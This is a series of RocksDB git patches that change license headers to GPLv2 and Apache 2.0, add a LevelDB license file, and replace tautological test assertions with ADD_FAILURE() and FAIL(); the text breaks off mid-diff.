a/utilities/persistent_cache/volatile_tier_impl.h b/utilities/persistent_cache/volatile_tier_impl.h index cdded0bc63a..dba500ccbb2 100644 --- a/utilities/persistent_cache/volatile_tier_impl.h +++ b/utilities/persistent_cache/volatile_tier_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/utilities/redis/redis_lists_test.cc b/utilities/redis/redis_lists_test.cc index ce2016032b7..22acdff6444 100644 --- a/utilities/redis/redis_lists_test.cc +++ b/utilities/redis/redis_lists_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). /** * A test harness for the Redis API built on rocksdb. * diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc index 0f189f4b31b..335ac9896d0 100644 --- a/utilities/simulator_cache/sim_cache.cc +++ b/utilities/simulator_cache/sim_cache.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/utilities/sim_cache.h" #include diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc index deaedb1a80f..01b328c783e 100644 --- a/utilities/simulator_cache/sim_cache_test.cc +++ b/utilities/simulator_cache/sim_cache_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/utilities/sim_cache.h" #include diff --git a/utilities/spatialdb/spatial_db.cc b/utilities/spatialdb/spatial_db.cc index 5d7c58fd00a..539ddd06ee0 100644 --- a/utilities/spatialdb/spatial_db.cc +++ b/utilities/spatialdb/spatial_db.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/spatialdb/spatial_db_test.cc b/utilities/spatialdb/spatial_db_test.cc index 74ac48dca93..7e0d67489f5 100644 --- a/utilities/spatialdb/spatial_db_test.cc +++ b/utilities/spatialdb/spatial_db_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/spatialdb/utils.h b/utilities/spatialdb/utils.h index 00160ebe06f..fe4b4e25321 100644 --- a/utilities/spatialdb/utils.h +++ b/utilities/spatialdb/utils.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/utilities/table_properties_collectors/compact_on_deletion_collector.cc index 9905d237b1b..304cdfff889 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "utilities/table_properties_collectors/compact_on_deletion_collector.h" diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.h b/utilities/table_properties_collectors/compact_on_deletion_collector.h index 6e21001bf50..bd240e5170d 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.h +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc index d6c5ece2d6b..3c946bf414f 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/transactions/optimistic_transaction_db_impl.cc b/utilities/transactions/optimistic_transaction_db_impl.cc index 184671e56df..001ebefe1f3 100644 --- a/utilities/transactions/optimistic_transaction_db_impl.cc +++ b/utilities/transactions/optimistic_transaction_db_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/optimistic_transaction_db_impl.h b/utilities/transactions/optimistic_transaction_db_impl.h index 5721e499e51..48f83805771 100644 --- a/utilities/transactions/optimistic_transaction_db_impl.h +++ b/utilities/transactions/optimistic_transaction_db_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index f373c7b7d3f..5652189bc35 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction_impl.h index f8c98e1e232..6baec6962ec 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction_impl.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/transactions/optimistic_transaction_test.cc b/utilities/transactions/optimistic_transaction_test.cc index c708163f4ca..f627f0e0955 100644 --- a/utilities/transactions/optimistic_transaction_test.cc +++ b/utilities/transactions/optimistic_transaction_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_base.cc b/utilities/transactions/transaction_base.cc index 0042649ad10..0357c113f23 100644 --- a/utilities/transactions/transaction_base.cc +++ b/utilities/transactions/transaction_base.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index b1b8c02db2f..1514836489e 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/transaction_db_impl.cc index 6eb0d22f4eb..2c425dd8d66 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/transaction_db_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_db_impl.h b/utilities/transactions/transaction_db_impl.h index c1e50deafc5..428512e8246 100644 --- a/utilities/transactions/transaction_db_impl.h +++ b/utilities/transactions/transaction_db_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_db_mutex_impl.cc b/utilities/transactions/transaction_db_mutex_impl.cc index 603d1b2e44c..b6120a1688b 100644 --- a/utilities/transactions/transaction_db_mutex_impl.cc +++ b/utilities/transactions/transaction_db_mutex_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_db_mutex_impl.h b/utilities/transactions/transaction_db_mutex_impl.h index ded2c0fe96a..2cce05ba049 100644 --- a/utilities/transactions/transaction_db_mutex_impl.h +++ b/utilities/transactions/transaction_db_mutex_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index b848b1be20b..408b15bcd3d 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 0ffcbf9b59b..01f8f4b2a2d 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 487e614dbf1..a10aec17d7b 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index e6d623cd096..6389f8d7d3d 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 5abe23cdb15..90cec396b40 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_util.cc b/utilities/transactions/transaction_util.cc index 63e5b3af647..ad03a94320f 100644 --- a/utilities/transactions/transaction_util.cc +++ b/utilities/transactions/transaction_util.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_util.h b/utilities/transactions/transaction_util.h index 8dea428bf8d..5c6b8fa490a 100644 --- a/utilities/transactions/transaction_util.h +++ b/utilities/transactions/transaction_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/util_merge_operators_test.cc b/utilities/util_merge_operators_test.cc index fe320ede797..d8b3cfba69c 100644 --- a/utilities/util_merge_operators_test.cc +++ b/utilities/util_merge_operators_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "util/testharness.h" #include "util/testutil.h" diff --git a/utilities/write_batch_with_index/write_batch_with_index.cc b/utilities/write_batch_with_index/write_batch_with_index.cc index 9a8e5db78f2..dc5d0fcf60f 100644 --- a/utilities/write_batch_with_index/write_batch_with_index.cc +++ b/utilities/write_batch_with_index/write_batch_with_index.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/write_batch_with_index/write_batch_with_index_internal.cc b/utilities/write_batch_with_index/write_batch_with_index_internal.cc index f5d0b0e48c3..385d16fe695 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_internal.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_internal.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/write_batch_with_index/write_batch_with_index_internal.h b/utilities/write_batch_with_index/write_batch_with_index_internal.h index f8bc5869a64..ac20f1b862e 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_internal.h +++ b/utilities/write_batch_with_index/write_batch_with_index_internal.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/write_batch_with_index/write_batch_with_index_test.cc b/utilities/write_batch_with_index/write_batch_with_index_test.cc index ff2468afa69..5b1250a6431 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_test.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be From a7321fc97fc645585868642c7cb55b0eb5d8e5b8 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Sun, 16 Jul 2017 15:50:14 -0700 Subject: [PATCH 002/205] Remove the licensing description in CONTRIBUTING.md Summary: Closes https://github.com/facebook/rocksdb/pull/2590 Differential Revision: D5432539 Pulled By: siying fbshipit-source-id: 49902453bba3c95c1fb8354441b2198649e52bf4 --- CONTRIBUTING.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index d6467fe07b1..b8b1a412e30 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -12,8 +12,3 @@ Complete your CLA here: If you prefer to sign a paper copy, we can send you a PDF. Send us an e-mail or create a new github issue to request the CLA in PDF format. - -## License - -By contributing to RocksDB, you agree that your contributions will be -licensed under the [BSD License](LICENSE). From 4a2e4891fe4c6f66fb9e8e2d29b04f46ee702b52 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Sun, 16 Jul 2017 18:35:39 -0700 Subject: [PATCH 003/205] Add back the LevelDB license file Summary: Closes https://github.com/facebook/rocksdb/pull/2591 Differential Revision: D5432696 Pulled By: siying fbshipit-source-id: a613230ab916de0b279a65ef429ede65460a8db2 --- LICENSE.leveldb | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 LICENSE.leveldb diff --git a/LICENSE.leveldb b/LICENSE.leveldb new file mode 100644 index 00000000000..7108b0bfba7 --- /dev/null +++ b/LICENSE.leveldb @@ -0,0 +1,29 @@ +This contains code that is from LevelDB, and that code is under the following license: + +Copyright (c) 2011 The LevelDB Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. From f1a056e0054fbf2dfceed68b7672240e49ca8ff1 Mon Sep 17 00:00:00 2001 From: Yedidya Feldblum Date: Sun, 16 Jul 2017 21:23:33 -0700 Subject: [PATCH 004/205] CodeMod: Prefer ADD_FAILURE() over EXPECT_TRUE(false), et cetera Summary: CodeMod: Prefer `ADD_FAILURE()` over `EXPECT_TRUE(false)`, et cetera. The tautologically-conditioned and tautologically-contradicted boolean expectations/assertions have better alternatives: unconditional passes and failures. Reviewed By: Orvid Differential Revision: D5432398 Tags: codemod, codemod-opensource fbshipit-source-id: d16b447e8696a6feaa94b41199f5052226ef6914 --- db/corruption_test.cc | 4 ++-- db/db_block_cache_test.cc | 4 ++-- db/write_batch_test.cc | 16 ++++++++-------- table/mock_table.cc | 2 +- util/thread_local_test.cc | 2 +- utilities/backupable/backupable_db_test.cc | 2 +- utilities/checkpoint/checkpoint_test.cc | 2 +- utilities/lua/rocks_lua_test.cc | 2 +- .../persistent_cache/persistent_cache_test.cc | 4 ++-- utilities/transactions/transaction_test.cc | 6 +++--- utilities/ttl/ttl_test.cc | 12 ++++++------ 11 files changed, 28 insertions(+), 28 deletions(-) diff --git a/db/corruption_test.cc b/db/corruption_test.cc index f9ab8302c0a..9f423757959 100644 --- a/db/corruption_test.cc +++ b/db/corruption_test.cc @@ -152,7 +152,7 @@ class CorruptionTest : public testing::Test { struct stat sbuf; if (stat(fname.c_str(), &sbuf) != 0) { const char* msg = strerror(errno); - ASSERT_TRUE(false) << fname << ": " << msg; + FAIL() << fname << ": " << msg; } if (offset < 0) { @@ -213,7 +213,7 @@ class CorruptionTest : public testing::Test { return; } } - ASSERT_TRUE(false) << "no file found at level"; + FAIL() << "no file found at level"; } diff --git a/db/db_block_cache_test.cc b/db/db_block_cache_test.cc index 317597cb637..169cadc85c3 100644 --- a/db/db_block_cache_test.cc +++ b/db/db_block_cache_test.cc @@ -497,7 +497,7 @@ TEST_F(DBBlockCacheTest, CompressedCache) { options.compression = kNoCompression; break; default: - ASSERT_TRUE(false); + FAIL(); } CreateAndReopenWithCF({"pikachu"}, options); // default column family doesn't have block cache @@ -560,7 +560,7 @@ TEST_F(DBBlockCacheTest, CompressedCache) { ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT), 0); break; default: - ASSERT_TRUE(false); + FAIL(); } options.create_if_missing = true; diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 388155b6384..4fd156d9bae 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -451,20 +451,20 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { } virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } virtual Status SingleDeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { EXPECT_TRUE(false); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < kNumUpdates; } } handler; @@ -502,20 +502,20 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { } virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } virtual Status SingleDeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return 